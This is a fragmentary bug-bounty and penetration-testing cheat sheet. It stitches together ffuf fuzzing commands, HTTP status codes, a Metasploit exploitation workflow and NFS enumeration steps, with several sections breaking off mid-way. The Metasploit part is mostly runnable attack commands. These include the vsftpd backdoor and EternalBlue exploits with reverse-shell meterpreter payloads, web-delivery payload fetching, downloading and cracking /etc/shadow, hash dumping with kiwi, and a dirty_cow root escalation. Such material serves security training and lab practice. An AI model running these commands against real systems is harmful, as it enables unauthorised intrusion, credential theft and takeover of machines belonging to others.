Bug-Bounty

1. Directory and File Brute Forcing Basic Directory Fuzzing: ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ/ Fuzz common directory names (e.g., /admin/, /uploads/). 2. Fuzzing Parameters Basic Parameter Fuzzing: ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ Replaces FUZZ with words from the wordlist to test URL parameters. Filter by Status Code: ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ -mc 200 Shows responses only for the 200 OK status code. Filter by Content Size: ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ -fs 150 Filters results based on exact response size in bytes. Fuzzing with JSON Payload (for APIs): ...

These codes indicate that the request was successfully received, understood, and accepted. 200 OK: The request was successful. 201 Created: The request was successful, and a resource was created. 202 Accepted: The request has been accepted but not yet processed. 204 No Content: The request was successful, but there is no content to send back. 3xx: Redirection These codes indicate that further action is needed to complete the request. 301 Moved Permanently: The resource has been permanently moved to a new URL. ...

🌐 1.Start Metasploit Console sudo systemctl start postgresql msfconsole Initialize the Metasploit Database (First Time Only) msfdb init 🔍 2. Scanning Targets Quick Target Discovery nmap -sn 10.10.10.0/24 Full Port + Version Scan (Integrated with Metasploit DB) db_nmap -sC -sV -O -Pn 10.10.10.129 View Discovered Hosts & Services hosts services 🪡 3. Exploit Search and Module Use Search by service name or CVE search vsftpd search type:exploit name:smb Load a Module use exploit/unix/ftp/vsftpd_234_backdoor Explore Module Info info # Shows full module details (author, platform, options, etc) show options # Required + optional settings (RHOSTS, LHOST, etc) show advanced # Advanced options like threads, timeouts, proxies show payloads # Compatible payloads for this exploit 💡 4. Linux Exploitation Workflow Example: FTP Backdoor use exploit/unix/ftp/vsftpd_234_backdoor set RHOSTS 10.10.10.129 set payload cmd/unix/interact run If Shell is Basic: Upgrade python3 -c 'import pty; pty.spawn("/bin/bash")' Or Use Web Delivery use exploit/multi/script/web_delivery set payload linux/x86/meterpreter/reverse_tcp set LHOST <your_ip> set LPORT 4444 run Post-Exploitation (Linux) sessions -i 1 getuid sysinfo Enumerate OS and Configs run post/linux/gather/enum_os run post/linux/gather/enum_configs Dump Password Hashes download /etc/passwd download /etc/shadow john shadow --wordlist=/usr/share/wordlists/rockyou.txt Local Exploit Suggestion run post/multi/recon/local_exploit_suggester Example Local Root Exploit use exploit/linux/local/dirty_cow set SESSION 1 run Confirm Root id whoami 💻 5. Windows Exploitation Workflow Example: EternalBlue use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 10.10.10.130 set LHOST <your_ip> set payload windows/x64/meterpreter/reverse_tcp run Session Handling sessions sessions -i 1 sysinfo getuid Post-Exploitation (Windows) Dump Hashes hashdump load kiwi kiwi_cmd "lsadump::sam" Process Migration ps migrate <pid> getpid Privilege Escalation getsystem Or use: ...

To scan for rpcbind on a network and check NFS shares, use the following command: sudo nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP # Scanning port 111 for rpcbind and list NFS shares Listing Mounted Partitions on the Network To list the mounted partitions of a network system, use: showmount -e $IP # List the exported directories on the NFS server Mounting rpcbind Directories on Local Machine To mount a remote NFS directory on local machine. In this example, the directory /var is mounted from the remote server with IP 10.10.122.178. ...